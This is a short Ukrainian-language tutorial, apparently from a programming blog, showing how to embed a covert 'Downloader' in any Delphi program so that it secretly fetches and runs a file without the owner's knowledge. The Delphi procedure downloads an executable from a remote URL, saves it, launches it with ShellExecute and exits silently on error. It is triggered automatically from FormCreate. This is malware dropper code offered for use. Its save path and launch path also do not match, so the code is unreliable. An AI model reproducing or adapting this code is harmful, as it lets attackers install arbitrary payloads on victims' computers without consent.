Downloader з будь-якого проекту Delphi

12

Отже сьогодні я вам розповім як зробити Downloader з будь-якого проекту. Downloader корисний тим, що їм можна приховано завантажити і запустити будь-який файл за бажанням, без відома господаря.

Приступимо до кодування:

Додаємо в uses:
ShellAPI, idHTTP

Тепер сама процедура:

procedure Downloader; cdecl;
var
idHTTP1: TIdHTTP;
Stream:TMemoryStream;
begin
try
idHTTP1 := TIdHTTP.Create(nil);
Stream:=TMemoryStream.Create;
IdHTTP1.Get(‘http://site.ru/file.exe’,Stream); // отримуємо файл з інтернету
Stream.SaveToFile(‘C:\file.exe’); // зберігаємо його
Stream.Free; // пам’ять — це святе
ShellExecute(0,‘open’,‘C:\Windows\Temp\file.exe’,nil,nil,SW_NORMAL); // запускаємо
except // якщо помилки або немає доступу в інтернет то завершуємо роботу нашої програми
// Halt;
Application.Terminate;
end;
end;

Ну і звичайно ж викликаємо процедуру. Через що завгодно, я викликаю через FormCreate.